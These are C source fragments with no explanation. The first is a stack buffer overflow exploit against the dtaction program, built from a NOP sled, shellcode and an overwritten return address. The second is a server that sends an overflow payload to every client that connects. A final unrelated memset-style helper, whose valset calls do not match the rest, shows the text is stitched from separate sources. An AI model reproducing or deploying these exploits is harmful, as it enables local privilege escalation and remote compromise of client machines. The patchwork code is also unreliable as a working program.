main()
{
char buf[BUF_SIZE];
unsigned int esp=get_sp(),sw;
memset(buf,NOP,BUF_SIZE);
memcpy(buf+EIP_OFFSET-strlen(shell_code),shell_code,
strlen(shell_code));
printf("esp=%x\n",esp);
printf("0:Default value 1:Calculated value >");
fflush(stdout);
scanf("%d",&sw);
if (sw==0){
valset(buf+FAKE_OFFSET, FAKE_VALUE);
valset(buf+EIP_OFFSET , EIP_VALUE);
printf("Jumping address = %x\n",EIP_VALUE);
}else{
valset(buf+FAKE_OFFSET, esp-FAKE_VALUE_DIF);
valset(buf+EIP_OFFSET , esp+EIP_VALUE_DIF);
printf("Jumping address = %x\n",esp+EIP_VALUE_DIF);
}
buf[BUF_SIZE-1]=0;
execl("/usr/dt/bin/dtaction",buf,NULL);
}
main()
{
FILE *fp;
static char buf[MAXBUF];
static char pkt[MAXBUF*2];
char tmp[512];
int sock,sock_accept;
int optval;
struct sockaddr_in addr;
memset(buf,NOP,MAXBUF);
valset(buf+RETADR,JMPESP_ADR);
valset(egg+OFS_LoadLibrary,ADDR_LoadLibrary);
valset(egg+OFS_GetProcAddress,ADDR_GetProcAddress);
strncpy(buf+CODEOFS,egg,strlen(egg));
buf[MAXBUF-1]=0;
sprintf(pkt,RESP,buf);
if ((sock=socket(AF_INET,SOCK_STREAM,0))==-1){
perror("socket");
exit(1);
}
optval=1;
setsockopt(sock,SOL_SOCKET,SO_REUSEADDR,(void *)&optval,sizeof(optval));
addr.sin_family = AF_INET;
addr.sin_port = htons(SERVICE_PORT);
addr.sin_addr.s_addr = INADDR_ANY;
if ((bind(sock,(struct sockaddr *)&addr,sizeof(addr)))==-1){
perror("bind");
close(sock);
exit(1);
}
if (listen(sock,1)==-1){
perror("listen");
close(sock);
exit(1);
}
for (;;){
if ((sock_accept=accept(sock,NULL,NULL))==-1){
perror("accept");
close(sock);
exit(1);
}
if (recv(sock_accept,tmp,sizeof(tmp),0)<=0){
close(sock_accept);
continue;
}
send(sock_accept,pkt,strlen(pkt),0);
close(sock_accept);
}
}
void *val_memset(void *data, const void *val, valType_t vt, size_t cnt)
{
void *ptr = data;
if (data == NULL || val == NULL)
return NULL;
while (cnt--)
valset(ptr++, val, vt);
return data;
}
